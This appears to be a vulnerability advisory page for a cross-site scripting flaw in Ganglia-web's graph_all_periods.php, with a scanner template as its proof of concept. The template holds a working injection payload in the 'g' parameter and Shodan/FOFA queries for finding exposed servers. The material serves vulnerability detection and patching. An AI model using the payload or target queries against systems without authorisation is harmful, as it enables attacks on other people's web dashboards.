CVE-2024-52763: Ganglia Web Interface (v3.7.3 - v3.7.5) - Cross-Site Scripting

2025-08-01 Ganglia Web Interface PoC Public

Description

A cross-site scripting (XSS) vulnerability in the component /graph_all_periods.php of Ganglia-web v3.73 to v3.75 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "g" parameter.

PoC

id: CVE-2024-52763

info:
  name: Ganglia Web Interface (v3.7.3 - v3.7.5) - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    A cross-site scripting (XSS) vulnerability in the component /graph_all_periods.php of Ganglia-web v3.73 to v3.75 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "g" parameter.
  impact: |
    Authenticated attackers can execute arbitrary JavaScript or HTML in victim browsers by injecting malicious payloads into the g parameter.
  remediation: |
    Update Ganglia-web to version 3.7.6 or later to address the XSS vulnerability in the graph parameter.
  reference:
    - https://github.com/ganglia/ganglia-web/issues/382
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2024-52763
    cwe-id: CWE-79
    epss-score: 0.00615
    epss-percentile: 0.4782
    cpe: cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:*
  metadata:
    vendor: ganglia
    product: ganglia-web
    shodan-query: http.html:"ganglia_form.submit()"
    fofa-query: body="ganglia_form.submit()"
  tags: cve,cve2024,xss,ganglia,vkev,vuln

http:
  - raw:
      - |
        GET /ganglia/graph_all_periods.php?g=%22%22%20autofocus%20onfocus=alert(document.domain)//%22 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"" autofocus onfocus=alert(document.domain)//"'
          - 'metricActions'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"
# digest: 4a0a00473045022038068fd5a3f7eb7303c09ce0b6dca955e7083c9664f17dc81ebe63044aba0843022100d0759403563b23e66c65c839c4bab9247455fc6afaef9fba4d1a9cf8c87530ce:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities